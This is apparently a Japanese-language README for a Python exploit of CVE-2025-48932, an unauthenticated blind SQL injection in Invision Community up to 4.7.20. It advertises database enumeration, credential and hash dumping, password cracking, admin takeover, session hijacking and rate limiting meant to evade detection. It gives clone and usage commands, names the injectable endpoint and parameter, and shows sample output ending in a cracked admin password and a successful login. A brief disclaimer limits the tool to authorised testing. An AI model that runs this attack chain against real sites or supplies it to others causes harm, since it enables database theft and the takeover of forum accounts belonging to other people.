
CVE-2025-48932 - Invision Community ≤ 4.7.20用の未認証SQLインジェクションエクスプロイト。データベース列挙、資格情報ダンプ、管理者乗っ取り、セッションハイジャック、マルチスレッドによる完全自動化エクスプロイト。依存関係は不要です。Sudeepa Wanigarathnaによるセキュリティ研究ツール。
CVE-2025-48932 は、Invision Community バージョン ≤ 4.7.20 で発見された認証を必要としない重大なブラインドSQLインジェクション脆弱性です。このエクスプロイトにより、リモートの攻撃者は以下を実行できます:
| 機能 | 説明 | ステータス |
|---|---|---|
| 🚀 依存関係ゼロ | Pure Python標準ライブラリのみ - pip install不要 | ✅ |
| ⚡ マルチスレッド | 設定可能なスレッド数による超高速データ抽出 | ✅ |
| 🤖 完全自動化 | 検出からレポート作成までの完全なエクスプロイトチェーン | ✅ |
| 👑 管理者乗っ取り | セッションハイジャックと権限昇格 | ✅ |
| 🔑 認証情報ダンプ | ユーザー、パスワードハッシュ、メールアドレスの抽出 | ✅ |
| 🔓 パスワードクラッキング | ワードリスト対応の組み込みハッシュクラッキング | ✅ |
| 📋 JSONレポート | 分析とドキュメント作成のための構造化出力 | ✅ |
| 🔌 プロキシサポート | Burp Suiteとカスタムプロキシの統合 | ✅ |
| 🎨 カラー出力 | 進捗インジケータ付きの見やすいターミナル出力 | ✅ |
| 🛡️ レート制限 | 検知を回避するための組み込み遅延 | ✅ |
$ python3 exploit.py -u https://vulnerable-site.com -v
╔══════════════════════════════════════════════════════════════════╗
║ CVE-2025-48932 - Invision Community SQL Injection ║
║ Author: Sudeepa Wanigarathna ║
║ Critical: Unauthenticated Remote Code Execution ║
╚══════════════════════════════════════════════════════════════════╝
[*] Target: https://vulnerable-site.com
[*] Performing vulnerability assessment...
[+] Target is confirmed VULNERABLE!
[*] Enumerating database information...
[+] Database Information:
Version: 10.4.32-MariaDB
User: invision@localhost
Database: invision_community
Hostname: localhost
Basedir: /usr/
Datadir: /var/lib/mysql/
[*] Enumerating databases...
[+] Found 5 databases
Found: information_schema
Found: invision_community
Found: mysql
Found: performance_schema
Found: phpmyadmin
[*] Enumerating tables in invision_community...
[+] Found 12 tables
Found: core_members
Found: core_sessions
Found: admin_members
Found: cms_categories
Found: forums_posts
...
[*] Searching for credentials...
[+] Found credential table: core_members
Credentials: admin - $2y$10$abcdefghijklmnopqrstuvwxyz...
Credentials: moderator - $2y$10$1234567890abcdefghijklmnop...
Credentials: user123 - $2y$10$qwertyuiopasdfghjklzxcvbnm...
[*] Extracting admin information...
[+] Admin Information Found:
name: admin
email: [email protected]
id: 1
password_hash: $2y$10$abcdefghijklmnopqrstuvwxyz...
[*] Attempting to crack password hash...
[+] Detected hash type: bcrypt
[+] Password cracked: Admin@2024!
[*] Attempting admin bypass...
[+] Admin login successful!
[+] Credentials: admin:Admin@2024!
[+] Exploitation complete!
[+] Report saved to invision_exploit_report_1700000000.json
{
"target": "https://vulnerable-site.com",
"timestamp": "2026-08-02T12:34:56.789Z",
"vulnerable": true,
"database": {
"version": "10.4.32-MariaDB",
"user": "invision@localhost",
"database": "invision_community",
"hostname": "localhost"
},
"databases": [
"information_schema",
"invision_community",
"mysql",
"performance_schema",
"phpmyadmin"
],
"tables": [
"core_members",
"core_sessions",
"admin_members"
],
"credentials": [
{
"username": "admin",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz...",
"email": "[email protected]"
}
],
"admin_info": {
"name": "admin",
"email": "[email protected]",
"id": "1",
"password_hash": "$2y$10$abcdefghijklmnopqrstuvwxyz..."
},
"summary": {
"total_databases": 5,
"total_tables": 12,
"total_credentials": 3,
"vulnerable": true,
"successful": true
}
}
# リポジトリをクローン
git clone https://github.com/CerberusMrXi/CVE-2025-48932-Invision-Community-SQLi-Exploit.git
cd CVE-2025-48932-Invision-Community-SQLi-Exploit
# インストールする依存関係はありません!実行するだけです。
# ターゲットが脆弱かどうかを確認
python3 exploit.py -u https://example.com --check-only
# 冗長出力による完全なエクスプロイト
python3 exploit.py -u https://example.com -v
# プロキシ使用(Burp Suite)
python3 exploit.py -u https://example.com -p http://127.0.0.1:8080 -v
# 結果をカスタムファイルに保存
python3 exploit.py -u https://example.com -o results.json
# マルチスレッド抽出(より高速)
python3 exploit.py -u https://example.com -t 10
# 利用可能なすべてのデータをダンプ
python3 exploit.py -u https://example.com --dump-all
# パスワードクラッキング用のカスタムワードリストを使用
python3 exploit.py -u https://example.com --wordlist rockyou.txt -v
# サイレントモード(出力なし、レポートのみ)
python3 exploit.py -u https://example.com -o silent_report.json
# 詳細なエラーを表示するデバッグモード
python3 exploit.py -u https://example.com -v --debug
✅ 外部依存関係なし!
✅ Pure Python標準ライブラリのみ!
✅ pip installや仮想環境は不要!
# 人気のワードリストをダウンロード
wget https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
/applications/calendar/modules/front/calendar/view.phpIPS\calendar\modules\front\calendar\view::search()location(ユーザー指定の入力)GET /applications/calendar/modules/front/calendar/view.php?do=search&location=[SQL_INJECTION_PAYLOAD]
このツールは教育目的および許可されたテスト目的専用です。
このツールを使用することにより、以下に同意したものとみなされます:
コンピュータシステムへの不正アクセスは違法かつ非倫理的です。
| 引数 | 説明 | 例 |
|---|---|---|
-u, --url | 対象URL(必須) | -u https://example.com |
-p, --proxy | プロキシURL | -p http://127.0.0.1:8080 |
-t, --threads | スレッド数(デフォルト: 5) | -t 10 |
-o, --output | 結果の出力ファイル | -o results.json |
-v, --verbose | 冗長出力を有効にする | -v |
--check-only | 脆弱性の確認のみ行う | --check-only |
--dump-all | 利用可能なすべてのデータをダンプ | --dump-all |
--wordlist | クラッキング用のワードリストファイル | --wordlist rockyou.txt |